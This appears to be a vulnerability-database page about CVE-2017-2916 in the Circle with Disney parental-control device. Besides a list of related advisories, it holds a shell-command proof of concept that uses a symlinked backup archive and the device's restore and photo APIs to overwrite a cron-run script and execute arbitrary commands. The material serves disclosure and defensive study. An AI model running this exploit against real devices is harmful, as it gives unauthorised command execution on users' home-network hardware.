| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Circle with Disney Backlink Vulnerability | 2 Nov 201700:00 | – | cnvd | |
| CVE-2017-2916 | 7 Nov 201716:00 | – | cve | |
| CVE-2017-2916 | 7 Nov 201716:00 | – | cvelist | |
| EUVD-2017-12057 | 7 Oct 202500:30 | – | euvd | |
| CVE-2017-2916 | 7 Nov 201716:29 | – | nvd | |
| CVE-2017-2916 | 7 Nov 201716:29 | – | osv | |
| Cross site request forgery (csrf) | 7 Nov 201716:29 | – | prion | |
| Circle with Disney Configuration Restore Photos File Overwrite Vulnerability | 31 Oct 201700:00 | – | talos | |
| Vulnerability Spotlight: The Circle of a Bug’s Life | 31 Oct 201712:04 | – | talosblog |
The following proof of concept shows how to run an arbitrary command on the device, in this case the script power_down.sh is executed.
-- create backup binary
$ sAppid="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$ tree backup
backup
├── backup.version
├── configure.xml
└── photos
└── user.123.photo -> /mnt/shares/usr/bin/scripts/check_system_time.sh
$ tar -C backup -cvzf backup.tgz configure.xml photos backup.version
$ aescrypt -e -p $sAppid -o backup.bin backup.tgz
-- send binary for config restore
$ sCmd="/mnt/shares/usr/bin/scripts/circle/power_down.sh"
$ curl -k "https://${sIP}:4567/api/CONFIG/restore" -F "token=${sToken}" -F "appid=${sAppid}" -F "[email protected]"
-- wait for the device to reboot
-- overwrite "check_system_time.sh"
$ curl -k "https://${sIP}:4567/api/UPDATE/users/user/photo" --data "token=${sToken}&user.pid=123&photo=${sCmd}"
-- in 2 minutes, "check_system_time.sh" will be executed by a cronjob
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation